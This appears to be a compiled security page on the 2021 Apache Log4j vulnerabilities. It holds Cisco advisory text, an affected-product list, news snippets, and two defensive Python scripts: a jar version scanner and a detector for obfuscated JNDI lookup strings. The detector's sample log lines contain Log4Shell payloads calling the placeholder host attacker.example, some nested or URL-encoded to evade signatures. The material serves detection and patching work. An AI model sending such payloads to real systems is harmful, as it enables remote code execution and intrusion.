Critical Vulnerabilities in Apache Log4j Java Logging Library

On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library, affecting all Log4j2 versions earlier than 2.15.0, was disclosed:

- CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker-controlled LDAP and other JNDI-related endpoints

On December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed:

- CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack

(The title reflects Apache's initial assessment. The issue was later re-rated critical, because a non-default Pattern Layout that uses a Context Lookup such as ${ctx:loginId} lets attacker-controlled Thread Context data reach a JNDI lookup, giving an information leak and, in some environments, remote code execution.)

On December 18, 2021, a vulnerability in the Apache Log4j component affecting versions 2.16.0 and earlier was disclosed:

- CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation

On December 28, 2021, a vulnerability in the Apache Log4j component affecting versions 2.17.0 and earlier was disclosed:

- CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration

For a description of these vulnerabilities, see the Apache Log4j Security Vulnerabilities page.

Cisco's Response to These Vulnerabilities

Cisco assessed all products and services for impact from both CVE-2021-44228 and CVE-2021-45046. To help detect exploitation of these vulnerabilities, Cisco has released Snort rules at the following location: Talos Rules 2021-12-21. Product fixes listed in this advisory address both CVE-2021-44228 and CVE-2021-45046 unless otherwise noted.

Cisco has reviewed CVE-2021-45105 and CVE-2021-44832 and has determined that no Cisco products or cloud offerings are impacted by these vulnerabilities. Cisco's standard practice is to update integrated third-party software components to later versions as they become available.

This advisory is available at the following link: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
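The four disclosures above each name a first fixed release (2.15.0, 2.16.0, 2.17.0, 2.17.1), so the first job on any estate is inventory: find every log4j-core, including copies buried inside WARs and fat jars, and map its version onto those boundaries. The script below is an added example written for this page, not code from the Cisco advisory or from the Log4j project. It builds two constructed jars in memory (a 2.14.1 and a 2.17.1 log4j-core inside a WAR), reads the Maven pom.properties each ships, reports which CVEs the version falls inside, and also reports whether org/apache/logging/log4j/core/lookup/JndiLookup.class is still present, since deleting that class was the widely used stop-gap before patched builds were available. The fix boundaries are taken from the advisory text; the 2.12.x and 2.3.x backport branches for old Java runtimes are not modelled, and the jar contents are placeholders.

```python
"""Log4j 2 inventory check for the four CVEs in the advisory above."""
import io
import re
import zipfile

POM_PATH = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# (CVE, first 2.x release that is no longer affected), from the advisory text.
# The 2.12.x and 2.3.x backport branches for old Java runtimes are not modelled.
FIXED_IN = [
    ("CVE-2021-44228", "2.15.0"),
    ("CVE-2021-45046", "2.16.0"),
    ("CVE-2021-45105", "2.17.0"),
    ("CVE-2021-44832", "2.17.1"),
]

_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?$")


def parse_version(text):
    """Turn '2.0-beta9' or '2.17.1' into a tuple that sorts correctly.
    A pre-release sorts below the final release carrying the same number."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised Log4j version: %r" % text)
    pre_rank = {None: 3, "alpha": 0, "beta": 1, "rc": 2}[m.group(4)]
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0),
            pre_rank, int(m.group(5) or 0))


def affected_cves(version):
    """CVEs from FIXED_IN whose fix landed after `version`."""
    v = parse_version(version)
    return [cve for cve, fixed in FIXED_IN if v < parse_version(fixed)]


def assess_jar_bytes(data, path="<jar>"):
    """Walk a jar, plus any jar/war/ear nested inside it (WEB-INF/lib,
    BOOT-INF/lib, ...), and return one finding per log4j-core found."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = sorted(zf.namelist())
        if POM_PATH in names:
            props = zf.read(POM_PATH).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            version = m.group(1).strip() if m else "unknown"
            try:
                cves = affected_cves(version)
            except ValueError:
                cves = None  # unparsable version string: inspect by hand
            findings.append({
                "path": path,
                "version": version,
                "cves": cves,
                # Deleting JndiLookup.class was the December 2021 stop-gap for
                # the JNDI lookup bugs; it does nothing for CVE-2021-45105 or
                # CVE-2021-44832, so it is reported next to the version rather
                # than used to silence the version-based result.
                "jndi_lookup_present": JNDI_LOOKUP in names,
            })
        for name in names:
            if name.lower().endswith((".jar", ".war", ".ear")):
                findings.extend(assess_jar_bytes(zf.read(name), path + "!" + name))
    return findings


def build_fake_jar(version=None, with_jndi_lookup=True, nested=()):
    """Constructed test data (not a real Log4j build): a jar holding only the
    entries this scanner looks at.  version=None yields a container with no
    log4j-core metadata of its own, e.g. a WAR."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version is not None:
            zf.writestr(POM_PATH, "groupId=org.apache.logging.log4j\n"
                                  "artifactId=log4j-core\nversion=%s\n" % version)
            if with_jndi_lookup:
                zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder, not bytecode
        for inner_name, inner_bytes in nested:
            zf.writestr(inner_name, inner_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    war = build_fake_jar(nested=[
        ("WEB-INF/lib/log4j-core-2.14.1.jar", build_fake_jar("2.14.1", with_jndi_lookup=False)),
        ("WEB-INF/lib/log4j-core-2.17.1.jar", build_fake_jar("2.17.1")),
    ])
    for finding in assess_jar_bytes(war, "app.war"):
        print(finding)
```

On a real host, feed `assess_jar_bytes` the bytes of every *.jar, *.war and *.ear under the application directories; a 2.14.1 copy with JndiLookup.class removed still shows CVE-2021-45105 and CVE-2021-44832 as open, which is exactly the point of reporting the class separately from the version.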
Vulnerable Products (vendor, product, and version where one is listed)

- apache log4j
- apache log4j 2.0
- cvat computer vision annotation tool
- intel audio development kit
- intel datacenter manager
- intel genomics kernel library
- intel oneapi
- intel secure device onboard
- intel sensor solution firmware development kit
- intel system debugger
- intel system studio
- siemens sppa-t3000 ses3000 firmware
- siemens capital
- siemens capital 2019.1
- siemens comos
- siemens desigo cc advanced reports 4.0
- siemens desigo cc advanced reports 4.1
- siemens desigo cc advanced reports 4.2
- siemens desigo cc advanced reports 5.0
- siemens desigo cc advanced reports 5.1
- siemens desigo cc info center 5.0
- siemens desigo cc info center 5.1
- siemens e-car operation center
- siemens energy engage 3.1
- siemens energyip 8.5
- siemens energyip 8.6
- siemens energyip 8.7
- siemens energyip 9.0
- siemens energyip prepay 3.7
- siemens energyip prepay 3.8
- siemens gma-manager
- siemens head-end system universal device integration system
- siemens industrial edge management
- siemens industrial edge management hub
- siemens logo! soft comfort
- siemens mendix
- siemens mindsphere
- siemens navigator
- siemens nx
- siemens opcenter intelligence
- siemens operation scheduler
- siemens sentron powermanager 4.1
- siemens sentron powermanager 4.2
- siemens siguard dsa 4.2
- siemens siguard dsa 4.3
- siemens siguard dsa 4.4
- siemens sipass integrated 2.80
- siemens sipass integrated 2.85
- siemens siveillance command
- siemens siveillance control pro
- siemens siveillance identity 1.5
- siemens siveillance identity 1.6
- siemens siveillance vantage
- siemens siveillance viewpoint
- siemens solid edge cam pro
- siemens solid edge harness design
- siemens solid edge harness design 2020
- siemens spectrum power 4
- siemens spectrum power 4 4.70
- siemens spectrum power 7
- siemens spectrum power 7 2.30
- siemens teamcenter
- siemens tracealertserverplus
- siemens vesys
- siemens vesys 2019.1
- siemens xpedition enterprise
- siemens xpedition package integrator
- debian debian linux 10.0
- debian debian linux 11.0
- sonicwall email security
- fedoraproject fedora 34
- fedoraproject fedora 35
- siemens 6bk1602-0aa12-0tp0 firmware
- siemens 6bk1602-0aa22-0tp0 firmware
- siemens 6bk1602-0aa32-0tp0 firmware
- siemens 6bk1602-0aa42-0tp0 firmware
- siemens 6bk1602-0aa52-0tp0 firmware
Log4j Vulnerabilities: Attack Insights (Symantec Threat Intelligence, posted 23 Dec 2021)
Symantec data shows variation and scope of attacks. Apache Log4j is a Java-based logging utility. The library's main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the A...
IT threat evolution in Q3 2022 (Kaspersky; companion reports: non-mobile statistics, mobile statistics)
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures, according to Kaspersky Security Network, for Q3 2022: Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. Web Anti-Virus recognized 251,288,987...
Apply fixes responsibly in a timely manner or face the wrath of Lina Khan
The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else. In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late. The FTC is advising companies to consult the US Cy...
Third major fix in ten days is an infinite recursion flaw rated 7.5/10
The Apache Software Foundation (ASF) has revealed a third bug in its Java-based open-source logging library Log4j. CVE-2021-45105 is a 7.5/10-rated infinite recursion bug that was present in Log4j2 versions 2.0-alpha1 through 2.16.0. The fix is version 2.17.0 of Log4j. That's the third new version of the tool in the last ten days. In case you haven't been paying attention, version 2.15.0 was created to fix CVE-2021-44228, the critical-rated and trivial-to-exploit remote code execution f...
Federal agencies have a week to get their systems patched
The US government's Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021. Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released a wee...
Now open-source logging library's JNDI disabled entirely by default, message lookups removed
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and removes ...
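The exploitable functionality described above is Log4j's lookup substitution: a logged string containing `${jndi:ldap://host/x}` made the library fetch and load a remote object. Because lookups nest and are evaluated innermost-first, attackers wrapped the trigger in further lookups (`${${lower:j}ndi:...}`, `${${::-j}${::-n}${::-d}${::-i}:...}`, `${${env:NOSUCHVAR:-j}ndi:...}`) to slip past naive signatures. The detector below is an added example written for this page, not code from the Log4j project or from any vendor's rule set: it URL-decodes each log line once, collapses the obfuscation layers the same way Log4j's substitutor would, and then extracts the scheme and callback host from any `${jndi:` that remains. The access-log lines are constructed, attacker.example is a placeholder host, and only the lower, upper and default-value (`:-`) forms are modelled; other lookup types an attacker might abuse are left unresolved and would need adding.

```python
"""Detect `${jndi:` lookup strings, including the obfuscated forms seen in
the wild, in lines of constructed web-server access logs."""
import re
from urllib.parse import unquote

# Innermost ${...} that contains no further $, { or }
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A de-obfuscated JNDI lookup: scheme and host[:port]
_JNDI = re.compile(r"\$\{jndi:(\w+):(?://)?([^/}\s]*)", re.I)


def _resolve(inner, original):
    """Resolve one innermost lookup the way attackers rely on Log4j doing:
    ${lower:X} -> x, ${upper:x} -> X, ${anything:-default} -> default
    (which covers ${::-j} and ${env:NOSUCHVAR:-j}).  jndi itself and
    lookups not modelled here are returned unchanged."""
    key, _, arg = inner.partition(":")
    key = key.lower()
    if key == "jndi":
        return original
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    if ":-" in inner:
        return inner.split(":-", 1)[1]
    return original


def normalize(text, max_rounds=20):
    """Collapse obfuscation layers innermost-first, the order in which Log4j
    evaluates nested lookups, so `${${lower:j}ndi:...}` becomes `${jndi:...}`.
    max_rounds bounds the work on pathological input."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1), m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def scan_line(line):
    """One hit per JNDI lookup in `line`.  The line is URL-decoded once first,
    because the payload frequently arrives inside a query parameter."""
    text = normalize(unquote(line))
    return [{"scheme": m.group(1).lower(), "host": m.group(2),
             "lookup": m.group(0)} for m in _JNDI.finditer(text)]


def scan_lines(lines):
    """Scan a sequence of log lines; each hit records its 1-based line number."""
    hits = []
    for n, line in enumerate(lines, 1):
        for hit in scan_line(line):
            hit["line"] = n
            hits.append(hit)
    return hits


# Constructed sample access-log lines; attacker.example is a placeholder host.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:08 +0000] '
    '"GET /?q=${${lower:j}${upper:n}di:${lower:ldap}://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:10:12:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://attacker.example/c}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:10 +0000] '
    '"GET /?v=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%3A1099%2Fd%7D HTTP/1.1" 200 12 "-" "-"',
    '10.0.0.2 - - [10/Dec/2021:10:12:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${date:yyyy} benign lookup"',
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOGS):
        print(hit)
```

Run against the sample, lines 2 to 5 produce hits and line 6 does not: the `${date:yyyy}` lookup is left alone because only `${jndi:` is the trigger. The callback hosts the scanner extracts are the indicators worth pivoting on in DNS and egress logs, since a server that resolved or connected to one of them after logging the string is a server where the lookup ran.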
Oracle and Apache holes also on Uncle Sam's list of big bad abused bugs
The US government's Cybersecurity and Infrastructure Security Agency (CISA) is adding three more flaws to its list of known-exploited vulnerabilities, including one involving TP-Link routers that is being targeted by the operators of the notorious Mirai botnet. The other two placed on the list this week involve versions of Oracle's WebLogic Server software and the Apache Foundation's Log4j Java logging library. The command-injection flaw in TP-Link's Archer AX21 Wi-Fi 6 routers – tracked as CV...
Plus: Ransomware gangster sentenced, Dell patches more Log4j bugs, and cartoon apes gone bad
In Brief: Triton malware remains a threat to the global energy sector, according to an FBI warning. Triton is the software nasty used in a 2017 cyber attack carried out by a Russian government-backed research institution against a Middle East petrochemical facility. The new FBI warning [PDF] came a day after the US Department of Justice unsealed a pair of indictments that detail alleged Russian government efforts to use supply chain attacks and malware in an attempt to compromise and control crit...